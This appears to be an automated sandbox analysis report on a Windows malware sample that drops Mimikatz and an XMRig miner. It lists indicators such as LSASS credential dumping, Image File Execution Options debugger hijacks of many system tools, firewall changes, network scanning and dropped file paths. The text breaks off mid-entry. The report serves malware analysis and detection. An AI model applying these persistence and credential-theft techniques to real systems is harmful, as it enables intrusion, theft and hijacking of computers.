Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-11-2024 15:14
Behavioral task
behavioral1
Sample
bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe
Resource
win10v2004-20241007-en
General
-
Target
bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe
-
Size
9.2MB
-
MD5
a5e4bba72c378a9e27d1933eee650bbc
-
SHA1
0227bb44b954ba431f566ea09481af091197dec2
-
SHA256
bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c
-
SHA512
ce33241e168e693ebc28f154a6bfe48ad7ce33077a2df664b91b45f4b130347a9b421c0c79ca518c33ed64e3ea859e2069a53ff099f5206670dd59d6f3c6abc0
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaah:I6mknGzwHdOgEPHd9BbX/nivPlTXTYrj
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2080 created 1828 2080 zghnuwi.exe 37 -
Xmrig family
-
Contacts a large (4367) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 7 IoCs
resource yara_rule behavioral2/memory/924-177-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp xmrig behavioral2/memory/924-181-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp xmrig behavioral2/memory/924-202-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp xmrig behavioral2/memory/924-215-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp xmrig behavioral2/memory/924-221-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp xmrig behavioral2/memory/924-233-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp xmrig behavioral2/memory/924-248-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral2/memory/3216-0-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/3216-4-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/files/0x000a000000023b8a-6.dat mimikatz behavioral2/memory/264-8-0x0000000000400000-0x0000000000AA4000-memory.dmp mimikatz behavioral2/memory/2332-136-0x00007FF632000000-0x00007FF6320EE000-memory.dmp mimikatz behavioral2/memory/2332-137-0x00007FF632000000-0x00007FF6320EE000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts zghnuwi.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe zghnuwi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe zghnuwi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe zghnuwi.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4732 netsh.exe 2120 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 264 zghnuwi.exe 2080 zghnuwi.exe 3828 wpcap.exe 4940 igadlieeu.exe 2332 vfshost.exe 2276 eqelmsiua.exe 4120 xohudmc.exe 4668 yqiwma.exe 924 indtey.exe 5004 eqelmsiua.exe 4224 eqelmsiua.exe 4544 eqelmsiua.exe 4944 eqelmsiua.exe 3764 eqelmsiua.exe 2752 eqelmsiua.exe 4392 eqelmsiua.exe 2788 zghnuwi.exe 2472 eqelmsiua.exe 2260 eqelmsiua.exe 1204 eqelmsiua.exe 4592 eqelmsiua.exe 2500 eqelmsiua.exe 1196 eqelmsiua.exe 4144 eqelmsiua.exe 1468 eqelmsiua.exe 2200 eqelmsiua.exe 3544 eqelmsiua.exe 3160 hqnaebagm.exe -
Loads dropped DLL 12 IoCs
pid Process 3828 wpcap.exe 3828 wpcap.exe 3828 wpcap.exe 3828 wpcap.exe 3828 wpcap.exe 3828 wpcap.exe 3828 wpcap.exe 3828 wpcap.exe 3828 wpcap.exe 4940 igadlieeu.exe 4940 igadlieeu.exe 4940 igadlieeu.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 73 ifconfig.me 74 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 zghnuwi.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache zghnuwi.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\yqiwma.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\yqiwma.exe xohudmc.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData zghnuwi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 zghnuwi.exe -
resource yara_rule behavioral2/files/0x0007000000023c75-135.dat upx behavioral2/memory/2332-136-0x00007FF632000000-0x00007FF6320EE000-memory.dmp upx behavioral2/memory/2332-137-0x00007FF632000000-0x00007FF6320EE000-memory.dmp upx behavioral2/files/0x0007000000023c80-140.dat upx behavioral2/memory/2276-141-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/2276-145-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/files/0x0007000000023c7d-162.dat upx behavioral2/memory/924-163-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp upx behavioral2/memory/5004-170-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/4224-174-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/924-177-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp upx behavioral2/memory/4544-179-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/924-181-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp upx behavioral2/memory/4944-184-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/3764-188-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/2752-192-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/4392-196-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/924-202-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp upx behavioral2/memory/2472-205-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/2260-209-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/1204-213-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/924-215-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp upx behavioral2/memory/4592-218-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/924-221-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp upx behavioral2/memory/2500-223-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/1196-227-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/4144-230-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/1468-232-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/924-233-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp upx behavioral2/memory/2200-235-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/3544-237-0x00007FF6F9150000-0x00007FF6F91AB000-memory.dmp upx behavioral2/memory/924-248-0x00007FF761CE0000-0x00007FF761E00000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\bliinatya\UnattendGC\vimpcsvc.xml zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\schoedcl.xml zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\wpcap.exe zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\wpcap.dll zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\hqnaebagm.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\libeay32.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\svschost.xml zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\zghnuwi.exe bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe File created C:\Windows\bliinatya\rtbnheisb\Packet.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\docmicfg.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\vimpcsvc.xml zghnuwi.exe File created C:\Windows\uqrutnuy\spoolsrv.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\exma-1.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\ucl.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\docmicfg.xml zghnuwi.exe File created C:\Windows\uqrutnuy\svschost.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\crli-0.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\svschost.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\spoolsrv.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\cnli-1.dll zghnuwi.exe File created C:\Windows\uqrutnuy\schoedcl.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\schoedcl.xml zghnuwi.exe File created C:\Windows\bliinatya\Corporate\mimidrv.sys zghnuwi.exe File created C:\Windows\ime\zghnuwi.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\coli-0.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\xdvl-0.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\schoedcl.xml zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\vimpcsvc.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\Shellcode.ini zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\ip.txt zghnuwi.exe File created C:\Windows\uqrutnuy\zghnuwi.exe bbbe43ebd36d08fafee93df3460c4b1f28b260f5dfa525a2486d50b0e69ad47c.exe File created C:\Windows\bliinatya\UnattendGC\specials\libxml2.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\ssleay32.dll zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\spoolsrv.xml zghnuwi.exe File created C:\Windows\bliinatya\upbdrjv\swrpwe.exe zghnuwi.exe File opened for modification C:\Windows\bliinatya\rtbnheisb\Packet.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\tucl-1.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\spoolsrv.xml zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\igadlieeu.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\svschost.xml zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\docmicfg.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\tibe-2.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\zlib1.dll zghnuwi.exe File opened for modification C:\Windows\uqrutnuy\svschost.xml zghnuwi.exe File created C:\Windows\bliinatya\Corporate\vfshost.exe zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\spoolsrv.exe zghnuwi.exe File created C:\Windows\bliinatya\rtbnheisb\scan.bat zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\trfo-2.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\docmicfg.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\AppCapture32.dll zghnuwi.exe File opened for modification C:\Windows\bliinatya\Corporate\log.txt cmd.exe File created C:\Windows\bliinatya\UnattendGC\specials\trch-1.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\vimpcsvc.exe zghnuwi.exe File created C:\Windows\bliinatya\Corporate\mimilib.dll zghnuwi.exe File opened for modification C:\Windows\bliinatya\rtbnheisb\Result.txt hqnaebagm.exe File created C:\Windows\bliinatya\UnattendGC\specials\posh-0.dll zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\specials\schoedcl.exe zghnuwi.exe File created C:\Windows\uqrutnuy\vimpcsvc.xml zghnuwi.exe File created C:\Windows\uqrutnuy\docmicfg.xml zghnuwi.exe File created C:\Windows\bliinatya\UnattendGC\AppCapture64.dll zghnuwi.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1512 sc.exe 1188 sc.exe 456 sc.exe 528 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zghnuwi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zghnuwi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yqiwma.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened 